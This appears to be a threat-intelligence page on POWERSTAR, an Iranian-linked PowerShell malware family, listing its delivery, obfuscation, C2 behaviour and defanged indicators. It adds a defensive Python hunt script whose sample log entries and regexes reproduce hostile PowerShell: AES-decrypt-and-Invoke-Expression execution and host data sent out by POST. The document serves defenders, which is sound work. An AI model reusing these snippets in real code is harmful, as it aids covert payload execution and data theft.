POWERSTAR
POWERSTAR is a multi-stage PowerShell-based malware framework/variant associated with Iranian cyber-espionage activity. The content links it to Charming Kitten and to the Iran-based APT group GreenCharlie, whose toolset is described as centered on PowerShell malware variants including GORBLE, TAMECAT, and POWERSTAR. Reported delivery methods include spear-phishing using fake personas and compromised email accounts, and exploitation of Microsoft Exchange vulnerabilities.

The malware family uses advanced obfuscation, layered decryption, and in-memory execution to evade detection; noted obfuscation techniques include array fragments, wildcards, and string replacement. In the GreenCharlie execution chain, POWERSTAR is described as using AES-based decryption of embedded payloads and executing the decrypted content via Invoke-Expression. Related staging/C2 behavior described for this framework includes collecting the victim's OS and computer name, formatting the host data as JSON, encrypting and Base64-encoding it, and sending it via HTTP POST to command-and-control infrastructure. The content also notes overlap between TAMECAT and PowerStar artifacts, including a parameter value ($k12ey = T2r0y1M1e1n1o0w1) identified in a PowerStar variant by Volexity.

High-confidence infrastructure and lure examples tied to the broader GreenCharlie framework include domains such as activeeditor[.]info, webviewerpage[.]info, documentcloudeditor.ddnsgeek[.]com, coldwarehexahash.dns-dynamic[.]net, uptime-timezone.dns-dynamic[.]net, and translatorupdater.dns-dynamic[.]net; documentcloudeditor.ddnsgeek[.]com was observed resolving to 38.180.146[.]174.
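A defender-side hunt over PowerShell script-block logs for the chain described above (AES CreateDecryptor, Base64 decode, Invoke-Expression, string-fragment obfuscation, the $k12ey key noted by Volexity, and the JSON host-data POST). This is an added example, not code from Mallory, Volexity or the original page; the sample events, indicator weights and threshold are constructed assumptions.

```python
import re

# Constructed sample script-block log entries (Event ID 4104 ScriptBlockText), not real POWERSTAR captures.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "text": "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer }"},
    {"id": 2, "host": "WS07", "text": (
        "$k12ey = 'T2r0y1M1e1n1o0w1'; $a = [System.Security.Cryptography.Aes]::Create(); "
        "$d = $a.CreateDecryptor(); $b = [Convert]::FromBase64String($blob); "
        "$c = ('Inv'+'oke-Ex'+'pression'); & $c ([Text.Encoding]::UTF8.GetString($d.TransformFinalBlock($b,0,$b.Length)))")},
    {"id": 3, "host": "WS09", "text": (
        "$info = @{os=(Get-CimInstance Win32_OperatingSystem).Caption; cn=$env:COMPUTERNAME} | ConvertTo-Json; "
        "$enc = [Convert]::ToBase64String($aes.CreateEncryptor().TransformFinalBlock($bytes,0,$bytes.Length)); "
        "Invoke-WebRequest -Uri $u -Method POST -Body $enc")},
    {"id": 4, "host": "SRV02", "text": "$s = [Convert]::FromBase64String($cfg); [Text.Encoding]::UTF8.GetString($s) | ConvertFrom-Json"},
]

# Each indicator: name, regex, weight. Weights are assumed tuning values, not vendor-published.
INDICATORS = [
    ("aes_decrypt", r"\.CreateDecryptor\(", 3),                # AES decryptor for an embedded payload
    ("base64_decode", r"\[Convert\]::FromBase64String\(", 1),  # common in benign scripts, low weight alone
    ("iex", r"\bInvoke-Expression\b|(?<![\w-])iex\b", 3),      # execution of decrypted content
    ("string_concat_obf", r"'[^']*'\s*\+\s*'[^']*'", 2),       # string-fragment obfuscation
    ("known_key_name", r"\$k12ey\b", 4),                       # variable name noted by Volexity
    ("known_key_value", r"T2r0y1M1e1n1o0w1", 5),               # key value noted by Volexity
    ("host_json_post", r"ConvertTo-Json.*(ToBase64String|CreateEncryptor).*-Method\s+POST", 5),
]
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

def normalize(text):
    """Collapse 'a'+'b' fragments so split cmdlet names become matchable."""
    prev = None
    while prev != text:
        prev = text
        text = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
    return text

def score_block(text):
    """Return (score, matched indicator names) for one script block."""
    norm = normalize(text)
    # Fragment obfuscation is judged on the raw text; everything else after normalization.
    hits = [n for n, p, _ in INDICATORS
            if re.search(p, text if n == "string_concat_obf" else norm, re.IGNORECASE)]
    return sum(w for n, _, w in INDICATORS if n in hits), hits

def hunt(events, threshold=5):
    """Flag events whose weighted indicator score reaches the threshold."""
    flagged = []
    for ev in events:
        score, hits = score_block(ev["text"])
        if score >= threshold:
            flagged.append({"id": ev["id"], "host": ev["host"], "score": score, "hits": hits})
    return flagged
```

Running hunt(SAMPLE_EVENTS) flags events 2 and 3 only; the lone Base64 decode in event 4 stays below threshold, which is the point of weighting the common indicators low.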
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
“GreenCharlie’s toolset centers on a multi-stage PowerShell-based malware framework, including variants known as GORBLE, TAMECAT, and POWERSTAR.”
Charming Kitten... specializes in espionage through spear-phishing... to deliver POWERSTAR malware, exploiting Microsoft Exchange vulnerabilities...
Techniques & procedures
6 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique: "The group utilizes the commercial registrar Namecheap to register domains that are thematically aligned with their social engineering lures..."
Initial Access
2 techniques: Charming Kitten, Haywire Kitten, and Remix Kitten are described as “exploiting Microsoft Exchange vulnerabilities,” including “ProxyShell.”
Multiple Iran-nexus APT groups are described as using spear-phishing: e.g., Charming Kitten uses “spear-phishing with fake personas and compromised emails… phishing via benign PDFs for credential harvesting”; several others use “spear-phishing with malicious documents/attachments/links.”
Execution
1 technique: "The entire GORBLE, TAMECAT, and POWERSTAR malware family is constructed as a multi-stage PowerShell execution chain."
Stealth
1 technique: "Obfuscation techniques include array fragments, wildcards, and string replacement..." and "MITRE ATT&CK techniques observed include ... obfuscated files/information (T1027)."
Command and Control
1 technique: "GreenCharlie leveraged dynamic DNS (DDNS) to establish and manage its infrastructure..."
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
Recent activity
5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Malware used by Charming Kitten in spear-phishing-driven espionage operations; delivered via compromised emails/fake personas and associated with Exchange exploitation.
Referenced as a related/variant family whose obfuscation style is similar to TAMECAT; no additional functional details provided in the content.
Referenced only for overlap in a key/value and YARA-rule similarity with the analyzed TAMECAT loader; no additional functional details provided in this content.
A PowerShell-based, multi-stage malware variant in GreenCharlie’s framework. Uses staged obfuscation and AES decryption/execution; described as using Invoke-Expression (iex) to run decrypted payload content, then performing C2 beaconing and encrypted/encoded host data transmission.